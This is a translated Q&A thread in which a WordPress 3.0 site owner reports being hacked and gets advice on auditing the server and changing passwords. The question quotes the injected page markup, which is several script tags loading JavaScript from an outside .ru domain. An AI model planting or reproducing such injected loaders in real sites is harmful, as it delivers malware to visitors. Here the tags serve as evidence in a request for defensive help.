1. 首页
  2. 问答
  3. wordpress 3.0安全性?

wordpress 3.0安全性?

2010-08-11 73 views
0

我有一个网站与wordpress 3.0。wordpress 3.0安全性?

我注意到/ wp-admin今天显示以下错误。

警告:无法修改标头信息 - (/输出开始于/www/sites/.../files/html/wp-includes/default-constants.php:299)/ www/sites/..com/files/html/wp-includes/pluggable.php on line 890

我用IE的查看源代码。我发现了下面的代码。

script type="text/javascript" src="http://recordsquare.ru/KVM_Switch.js"></script> 
<!--661c36e2c5591b25cbc164e7b376623b--> 
<script type="text/javascript" src="http://recordsquare.ru/KVM_Switch.js"></script> 
<!--661c36e2c5591b25cbc164e7b376623b--><script type="text/javascript" src="http://recordsquare.ru/KVM_Switch.js"></script> 
<!--661c36e2c5591b25cbc164e7b376623b--><br />

它看起来像我的网站已被黑客入侵。

我只启用了cforms插件。

有什么想法或建议吗?

来源

2010-08-11 Moon

+0

找到被黑的模块/表/文件并将其删除。 – 2010-08-11 18:11:10

回答

1

将服务器脱机,然后对其运行安全审核,并为其上载内容的任何客户端运行安全审核。然后更改所有密码。

来源

2010-08-11 18:20:50 Quentin

+0

Dorward //感谢您的建议。所以..它可能不是由WP或WP插件引起的? – Moon 2010-08-11 18:23:39

+0

WordPress 3.0.1已经出来,它可能是一个安全更新(我没有选中),因此可能是漏洞。我对CFForms一无所知。这可能是服务器上的一个不相关的漏洞。它可能是恶意软件在客户端上嗅探了一个ftp密码。这就是安全审计的重点。 – Quentin 2010-08-11 18:26:58

+1

3.0.1不是安全发布。 – 2010-08-11 18:36:22

相关问题

 相关问题